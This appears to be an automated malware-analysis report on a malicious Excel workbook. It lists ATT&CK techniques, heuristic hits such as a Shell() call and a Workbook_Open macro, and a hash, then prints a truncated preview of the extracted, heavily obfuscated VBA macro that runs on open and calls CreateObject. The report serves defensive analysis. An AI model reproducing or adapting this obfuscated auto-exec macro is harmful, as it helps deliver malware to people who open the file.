MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The critical heuristic for a Shell() call in VBA fired, and together with the Workbook_Open macro it indicates that the sample is designed to execute arbitrary code when the workbook is opened. The VBA code itself is heavily obfuscated with loops and variable declarations, but these indicators strongly suggest downloader or dropper functionality. No specific URLs or executable payloads were directly extracted, which limits further analysis.
Heuristics (6)
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Workbook_Open macro [high] OLE_VBA_WBOPEN: Workbook_Open macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15132 bytes |

SHA-256: 94132390d844f2e8ee1998346307b652ced5d8ac4cfdf9e2b43e8a0f9e2982c7
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 5 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
inSGvKAdpS9KdZy.CC_lkBPHLEg1n8ZEZudr
While 14 = 7184
Dim ZjrLULPM3hAa1nXj5juCw7hsE2zDJJ As Variant
Wend
Dim Xu6Ckc3XpC1 As Integer
While 19 = 9571
Dim L8yLEuqyz467KcA9FcVKCqHOexB4qf3rJx As Variant
Wend
Dim sj43vDVUSdx As Integer
While 23 = 7610
Dim zGb4QLpo6dxiqPrvGS_MuWsZDMpQypVnZf84ZvNpBe2Nu As Variant
Wend
Dim SJdTiL_cjLaWByD As Integer
While 17 = 9753
Dim eWyNFIHJQxUTDRKOddotBJ6OcVIzReeX6JJm As Variant
Wend
Dim pmFjJ_LfM15IW7 As Integer
While 17 = 9169
Dim U_ASZhtt9Q1uQ6X3Ghh1WDhB8YBkZ_aUhmB1H1KF2Uj2GZ As Variant
Wend
Dim MPbBByW_dQe9T As Integer
While 25 = 1397
Dim AfHS9yeLn3gtPUa9Bco3gJuGW7l8cGtTIeJjrAjCl As Variant
Wend
Dim LiV5Qub5Ebwy_ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "inSGvKAdpS9KdZy"
Dim jZls36hxIL8idJzTNZM75GAQ6sr9y7yb8DXlVsO_P_2sYWg142j1EJIbYSwILh9L As String
Function wyu_5BLgseHKitI1O_2lPSkWLEKHBVo6d_rUyr_hyDcCMrq_RDza5(Yy7bMO1hc9akW_SBAvcRGymIqBQInqMpgi2e5zvYRnoqR28TvonJ4TsjJwuK8p4vttCwFwEI_D9cH6zyC7W8BBuLyQSG_)
While 11 = 6796
Dim My_ASwIbwGtpgoWxb6LPtbCa3pbeudCDHvqJm1WJ_RmX4W As Variant
Wend
Dim O8p5zFn2Wuv As Integer
While 2 = 5789
Dim mGlTmpQDpfu8LJjgAOZymfdYcyzn5XOX5W As Variant
Wend
Dim stzUkTSMzd_ctO As Integer
While 23 = 4768
Dim hlk66GFlKzxymHPPVBxJ1wJ4ycSRn5cT As Variant
Wend
Dim EWUvna9O2Fg_ As Integer
Dim kQBAX_nRordv8niRHB2RPKnunAwhFMYI2nm3G52KgwyRn5TxIcU9T5JXmPVWL_KaRT3SAoJLIpucVTEro8Xm2
While 11 = 3439
Dim gupJ6iG7nhWuZqFaxx7PUbsNvdk4BhRsOJVCwHUDvfog As Variant
Wend
Dim jU7TgZCHOmDB As Integer
While 13 = 7396
Dim aWa7M4ENneOSDnoa2dywKNKGmicFNj9gQ_Tt4EhkiQTD_lO3tkOuwPyK As Variant
Wend
Dim JRRmY89CfrBCR4 As Integer
While 17 = 6332
Dim gv5ML33FBARjUmSLsAIHijv4JjRPgVjKjzCcyiC6QCOQSykTsR8_ As Variant
Wend
Dim IS69ABljki As Integer
Dim giNlhDDpfX6toLmUf2b2Br2Xk936Ud5vXs_itEc7kZUhnsn488tnxJTxpz_iJGTAbIT5LCkYWeOkURs1S97WsP7MXJ23E4ucES_dXrp5UTOR4raWFGNKI7QKKFeBIqRbsvdBMMb
While 7 = 5473
Dim oYF_eiyVH8MzfTdiU87gNWjRZeFdxgYU As Variant
Wend
Dim ocj1LyEu36yAn As Integer
While 19 = 799
Dim RwkcZpnlDTPywh_bTgjg2IBslUe2JmQhhnFqd_ As Variant
Wend
Dim V1urkHSBYO As Integer
While 24 = 5071
Dim QhWMbvGu21_IuZYBqOHaQ8SJsvIh3Y As Variant
Wend
Dim j6Ov3_4S_286lHQ As Integer
While 8 = 9837
Dim q9PJEkuPwvSMLdpki1aPH38gSGWJObUTJ3 As Variant
Wend
Dim Bv3Vvwxoa_h1qy As Integer
While 9 = 4572
Dim XOXDI2Hw_rz8Mj_TZ8CSb3rK_macZ89bYhu_DPJ As Variant
Wend
Dim QsMuIewiLnF As Integer
While 22 = 290
Dim hiwWUdfK9eYoVBsWgny9OHwtiNFhpPDM As Variant
Wend
Dim xRXXoBKOb2Qn2D As Integer
Set giNlhDDpfX6toLmUf2b2Br2Xk936Ud5vXs_itEc7kZUhnsn488tnxJTxpz_iJGTAbIT5LCkYWeOkURs1S97WsP7MXJ23E4ucES_dXrp5UTOR4raWFGNKI7QKKFeBIqRbsvdBMMb = CreateObject(jZls36hxIL8idJzTNZM75GAQ6sr9y7yb8DXlVsO_P_2sYWg142j1EJIbYSwILh9L)
While 20 = 5445
Dim zsZGN4Wn1YvBwFW8eqaJzClTqebhfW1G2dWWFgBHzH As Variant
Wend
Dim a9klMD2cUiLpM As Integer
W
... (truncated)